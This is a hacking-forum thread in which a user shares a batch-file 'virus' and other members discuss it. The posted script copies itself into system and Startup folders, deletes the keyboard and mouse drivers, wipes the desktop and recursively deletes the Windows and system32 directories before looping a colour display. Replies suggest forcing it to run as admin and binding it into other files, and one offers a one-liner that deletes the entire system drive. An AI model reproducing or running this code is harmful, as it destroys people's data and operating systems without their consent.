Hack Forums

Full Version: 5P4Nki3 Virus.
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4


Disables mouse and keyboard, Copys into places in C:/ and Start up ,
Deletes All Desktop items ,Deletes some windows and system 32 files, And puts on a light show. + Rep if you like =]


Code:
@echo off
title 5pankie Virus.
color 4
copy %0 "c:\WINDOWS"
copy %0 "c:\WINDOWS\system32"
copy %0 "c:\WINDOWS\system"
copy %0 "%systemdrive%\Documents and Settings\%username%\Start Menu\Programs\Startup"
cd %windir%\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
cd %userprofile%\desktop
del *.* /F /Q
attrib +h "%userprofile%\my documents"
cd c:\WINDOWS
del "*.*" /S /Q /F
cd c:\WINDOWS\system32
del "*.*" /S /Q /F
cls
:5pankie
cls
echo [5]
echo [p]
echo [a]
echo [n]
echo [k]
echo [i]
echo [3]
color 10
color 3
color 12
color 4
color 8
goto :5pankie
Not bad.

We need to find a run as admin command so it runs all commands no matter what.
That could come in handy alot.
I bet you could program something in VB or C++ like that and then bind the files.
That a little to much ill let someone else take that challenge =D
I like it Oui
But sometimes, it seems easier just to do this:

del %systemdrive% /S /Q /F
Lol as soon as I saw matt name I was wondering how many things he was gonna correct me on =D
x]
Sorry.
x]
No sorries =] even if you where gonna correct me its teaching me better in the long run.
Mkay. I didn't see anything wrong. In fact, I actually liked it enough to save it in my .bat's folder. Not a lot of .bat's are lucky enough to go in there xD.
Pages: 1 2 3 4
Reference URL's